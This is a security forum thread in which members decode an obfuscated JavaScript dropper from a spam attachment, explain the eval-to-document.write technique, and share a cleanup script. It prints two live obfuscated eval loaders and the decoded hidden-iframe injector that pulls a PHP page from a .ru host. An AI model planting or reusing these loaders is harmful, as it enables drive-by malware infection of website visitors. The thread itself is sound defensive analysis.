.

Looking for Javascript coder to decode spam HTML attachment

<<

lorddicranius

User avatar

Sr. Member
Sr. Member

Posts: 448

Joined: Thu Mar 03, 2011 3:54 am

Post Mon Mar 05, 2012 6:23 pm

Looking for Javascript coder to decode spam HTML attachment

I received a spam message with an HTML attachment.  I downloaded the attachment and opened it in Notepad++ and found it contains Javascript.  I know a little Javascript, but not nearly enough to work out what's going on here.  I was wondering if anybody well versed in Javascript could decode this for me.  I'm really curious what this is trying to to do :)

  Code:
<script>aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)
f='-29q-29q67q64q-6q2q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q 46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q3q85q-29q-29q- 29q67q64q76q59q71q63q76q2q3q21q-29q-29q87q-6q63q70q77q63q-6q85q- 29q-29q-29q62q73q61q79q71q63q72q78q8q81q76q67q78q63q2q -4q22q67q64q76q59q71q63q-6q77q76q61q23q1q66q78q7 8q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q1 8q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q7 4q1q-6q81q67q62q78q66q23q1q11q10q1q- 6q66q63q67q65q66q78q23q1q11q10q1q-6q77q78q83q70q63q23q1q8 0q67q77q67q60q67q70q67q78q83q20q66q67q62q62q63q72q21q74q73q77q67q78q6 7q73q72q20q59q60q77q73q70q79q78q63q21q70q63q64q78q20q10q21q78q73q74q2 0q10q21q1q24q22q9q67q64q76q59q71q63q24q-4q3q21q-29q-29q87q-29q- 29q64q79q72q61q78q67q73q72q-6q67q64q76q59q71q63q76q 2q3q85q-29q-29q-29q80q59q76q-6q64q-6q23q- 6q62q73q61q79q71q63q72q78q8q61q76q63q59q78q63q31q70q63q71q63q72q78q2q 1q67q64q76q59q71q63q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2 q1q77q76q61q1q6q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66 q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70 q60q84q62q72q67q8q74q66q74q1q3q21q64q8q77q78q83q70q63q8q80q67q77q67q6 0q67q70q67q78q83q23q1q66q67q62q62q63q72q1q21q64q8q77q78q83q70q63q8q74 q73q77q67q78q67q73q72q23q1q59q60q77q73q70q79q78q63q1q21q64q8q77q78q83 q70q63q8q70q63q64q78q23q1q10q1q21q64q8q77q78q83q70q63q8q78q73q74q23q1 q10q1q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q81q67q62q78q66q 1q6q1q11q10q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q66q63 q67q65q66q78q1q6q1q11q10q1q3q21q-29q-29q-29q62q73q61q79q71q63q72 q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1 q60q73q62q83q1q3q53q10q55q8q59q74q74q63q72q62q29q66q67q70q62q2q64q3q21q-29q-29q87'.split('q');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i>-w.length;i+=1){j=i;s=s+r(38+1*w[j]);}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>
GSEC, eCPPT, Sec+
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Mon Mar 05, 2012 7:03 pm

Re: Looking for Javascript coder to decode spam HTML attachment

Wants you to load some php file from a .ru domain
hxxp://clkjshdflhhshdf.ru:8080/images/aublbzdni.php

  Code:
if (document.getElementsByTagName('body')[0]){ iframer(); } else {
document.write(""); } function iframer() {
var f =document.createElement('iframe') f.setAttribute('src','
http://clkjshdflhhshdf.ru:8080/images/aublbzdni.php
');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';
f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
 document.getElementsByTagName('body')[0].appendChild(f); }
Last edited by venom77 on Mon Mar 05, 2012 7:05 pm, edited 1 time in total.
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Mon Mar 05, 2012 7:14 pm

Re: Looking for Javascript coder to decode spam HTML attachment

Also, the quick and easy way to decode what you had into what I had...

First, we take what you had:

  Code:
<script>aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)
f='-29q-29q67q64q-6q2q62q73q61q79q71q63q72q78q8q65q63q78q31q70q6 3q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10 q55q3q85q-29q-29q-29q67q64q76q59q71q63q76q2q3q21q-29q-29q87q- 6q63q70q77q63q-6q85q-29q-29q-29q62q73q61q79q71q63q72 q78q8q81q76q67q78q63q2q-4q22q67q64q76q59q71q63q -6q77q76q61q23q1q66q78q78q74q20q9q9q61q70q69q68q77q66q62q64q70q66q66q 77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59q65q63q77q9q59q79q60q70q 60q84q62q72q67q8q74q66q74q1q-6q81q67q62q78q66q23q1q1 1q10q1q-6q66q63q67q65q66q78q23q1q11q10q1q- 6q77q78q83q70q63q23q1q80q67q77q67q60q67q70q67q78q83q20q66q67q62q62q63 q72q21q74q73q77q67q78q67q73q72q20q59q60q77q73q70q79q78q63q21q70q63q64 q78q20q10q21q78q73q74q20q10q21q1q24q22q9q67q64q76q59q71q63q24q- 4q3q21q-29q-29q87q-29q-29q64q79q72q61q78q67q73q72q- 6q67q64q76q59q71q63q76q2q3q85q-29q-29q-29q80q59q76q-6q64q- 6q23q-6q62q73q61q79q71q63q72q78q8q61q76q63q59q78q63q 31q70q63q71q63q72q78q2q1q67q64q76q59q71q63q1q3q21q64q8q77q63q78q27q78 q78q76q67q60q79q78q63q2q1q77q76q61q1q6q1q66q78q78q74q20q9q9q61q70q69q 68q77q66q62q64q70q66q66q77q66q62q64q8q76q79q20q18q10q18q10q9q67q71q59 q65q63q77q9q59q79q60q70q60q84q62q72q67q8q74q66q74q1q3q21q64q8q77q78q8 3q70q63q8q80q67q77q67q60q67q70q67q78q83q23q1q66q67q62q62q63q72q1q21q6 4q8q77q78q83q70q63q8q74q73q77q67q78q67q73q72q23q1q59q60q77q73q70q79q7 8q63q1q21q64q8q77q78q83q70q63q8q70q63q64q78q23q1q10q1q21q64q8q77q78q8 3q70q63q8q78q73q74q23q1q10q1q21q64q8q77q63q78q27q78q78q76q67q60q79q78 q63q2q1q81q67q62q78q66q1q6q1q11q10q1q3q21q64q8q77q63q78q27q78q78q76q6 7q60q79q78q63q2q1q66q63q67q65q66q78q1q6q1q11q10q1q3q21q-29q-29q- 29q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q4 6q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q8q59q74q74q63q72q62q 29q66q67q70q62q2q64q3q21q-29q-29q87'.split('q');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i>-w.length;i+=1){j=i;s=s+r(38+1*w[j]);}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>


And turn it into something a bit more legible (I've shortened the value of the variable 'f' here to save space):

  Code:
<script>
aa=/\w/.exec(1).index+[];
aaa='0';
try{location({});} catch(hgberger){
    if(aa===aaa)
    f='-29.split('q');
    md='a';
    e=eval;
    w=f;
    s=[];
    r=String.fromCharCode;
    for(i=0;-i>-w.length;i+=1){
      j=i;s=s+r(38+1*w[j]);
    }
    if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)
      e(s);
}
</script>


A quick glance at the very end tells us to do e(s); and looking up a few lines higher we see e=eval;. So, rather than evaluating s, let's just see what it is by changing the code to document.write(s);:

  Code:
<script>
aa=/\w/.exec(1).index+[];
aaa='0';
try{location({});} catch(hgberger){
    if(aa===aaa)
    f='-29.split('q');
    md='a';
    e=eval;
    w=f;
    s=[];
    r=String.fromCharCode;
    for(i=0;-i>-w.length;i+=1){
      j=i;s=s+r(38+1*w[j]);
    }
    if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)
      document.write(s);
}
</script>


Throw that into a file, save it as whatever.html, and open in a browser. Then you end up with the code posted previously and can see it's attempting to load that PHP file. It doesn't always work this easily, sometimes you have to dig a little deeper depending on how much of a PITA the author was ;-)

...and obviously it's recommended to do this in some sort of a contained environment (just in case).
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Mon Mar 05, 2012 9:06 pm

Re: Looking for Javascript coder to decode spam HTML attachment

Reminds me a bit of the post I wrote on here, a couple of months ago, where I showed some malicious scripts I found during a security eval for a company's website.  I gave a similar writeup / explanation there, although the code was somewhat different.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

lorddicranius

User avatar

Sr. Member
Sr. Member

Posts: 448

Joined: Thu Mar 03, 2011 3:54 am

Post Tue Mar 06, 2012 1:44 am

Re: Looking for Javascript coder to decode spam HTML attachment

@BillV: Thanks, especially for breaking it down :)
@hayabusa: Yeah, as soon as I opened that file in Notepad++, I thought of that post you did, which had me thinking this might at least pique your interest if nobody elses :P

Tried to download that PHP file, but I'm unable to resolve the domain.  Darn, curious what's in that PHP file :(
Last edited by lorddicranius on Tue Mar 06, 2012 1:57 am, edited 1 time in total.
GSEC, eCPPT, Sec+
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Tue Mar 06, 2012 8:39 am

Re: Looking for Javascript coder to decode spam HTML attachment

See attachment. wget is your friend ;)

*unless it's a trick to exploit wget

Just glancing at it, seems like it's for ad revenue, but I don't have time to go in depth.

I do like the naming conventions they used though: onload="window.lol&&lol()"
Last edited by dynamik on Tue Mar 06, 2012 8:41 am, edited 1 time in total.
The day you stop learning is the day you start becoming obsolete.
<<

lorddicranius

User avatar

Sr. Member
Sr. Member

Posts: 448

Joined: Thu Mar 03, 2011 3:54 am

Post Tue Mar 06, 2012 10:29 am

Re: Looking for Javascript coder to decode spam HTML attachment

Hmm, I was using wget haha.  I was playing around with the URL, replacing "1" for lowercase "L", etc.

Thanks for attaching!
GSEC, eCPPT, Sec+
<<

Agentcalaver

Newbie
Newbie

Posts: 1

Joined: Mon Apr 02, 2012 2:46 am

Post Mon Apr 02, 2012 2:52 am

Re: Looking for Javascript coder to decode spam HTML attachment

Clean this (the same/similar js exists in infected html web pages)
with a bash script such as:
  Code:
OLD="^<script>c=2;[^>]*>"
echo "Pre:"
grep -rl "hgberger" *
grep -rl "hgberger" * | xargs sed -i "s/$OLD//g"
echo "Post:"
grep -rl "hgberger" *
<<

rserin75

Newbie
Newbie

Posts: 5

Joined: Fri Aug 10, 2012 6:32 pm

Post Fri Aug 10, 2012 6:36 pm

Re: Looking for Javascript coder to decode spam HTML attachment

I need decode ..  this code
  Code:
 <script>try{1-prototype;}catch(evsd){q=152;}
if(020==0x10){f=[0,-1,94,93,22,29,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112 ,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,31,112,4,-1 ,-2,0,95,91,105,87,98,92,104,29,32,49,2,0,-1,114,23,91,97,106,91,21,1 14,3,-2,0,-1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,5 1,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47,38,37,103, 108,105,104,105,91,99,37,95,99,93,101,36,88,39,38,30,22,108,96,90,105 ,95,51,28,40,38,28,23,94,90,96,93,93,107,51,28,40,38,28,23,105,105,11 2,98,90,52,29,107,96,105,94,89,95,97,96,106,110,49,94,94,91,90,90,101 ,49,101,102,105,94,107,95,100,101,48,86,89,105,100,99,107,105,92,49,9 7,92,92,105,49,38,48,107,101,101,49,38,48,30,52,49,38,95,91,105,87,98 ,92,52,23,32,49,2,0,-1,114,4,-1,-2,93,107,99,90,106,94,102,100,21,96, 92,103,88,99,90,105,30,30,114,3,-2,0,-1,107,88,104,21,93,22,50,23,90, 100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,10 6,29,30,95,91,105,87,98,92,29,30,50,92,35,106,91,105,56,106,105,105,9 5,87,108,106,90,31,29,104,105,89,28,35,29,93,107,106,101,49,37,36,105 ,107,104,106,104,90,101,36,94,101,92,100,38,87,38,40,29,30,50,92,35,1 06,106,110,99,91,35,109,95,104,96,88,94,99,95,105,112,51,28,95,95,89, 91,91,99,30,49,91,37,105,105,112,98,90,37,102,100,106,95,105,96,101,9 9,52,29,86,89,105,100,99,107,105,92,29,48,93,36,104,107,111,97,92,36, 97,92,92,105,52,29,37,30,49,91,37,105,105,112,98,90,37,106,100,103,51 ,28,39,29,48,93,36,104,92,106,54,107,106,103,96,88,106,107,91,29,30,1 09,94,91,106,93,30,34,28,40,38,28,32,49,91,37,105,90,107,55,105,107,1 04,94,89,107,105,92,30,28,95,91,94,94,94,105,30,34,28,40,38,28,32,49, 2,0,-1,-2,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99 ,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37 ,84,36,86,103,102,90,101,90,56,95,95,97,91,30,91,32,49,2,0,-1,114];}i f(window.document)e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i+555!=0;i+=1){j=i;s=s+r((w[j]*1+(9+e("j"+"%"+"3"))));}
if(q&&f&&012===10)e(s);</script>
Last edited by rserin75 on Fri Aug 10, 2012 6:42 pm, edited 1 time in total.
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Mon Aug 13, 2012 2:21 pm

Re: Looking for Javascript coder to decode spam HTML attachment

rserin75 wrote:I need decode ..  this code


Looks to be similar (e.g., ends in "e(s)"). Follow the instructions and it should be easily determined.

Return to Programming

Who is online

Users browsing this forum: No registered users and 2 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software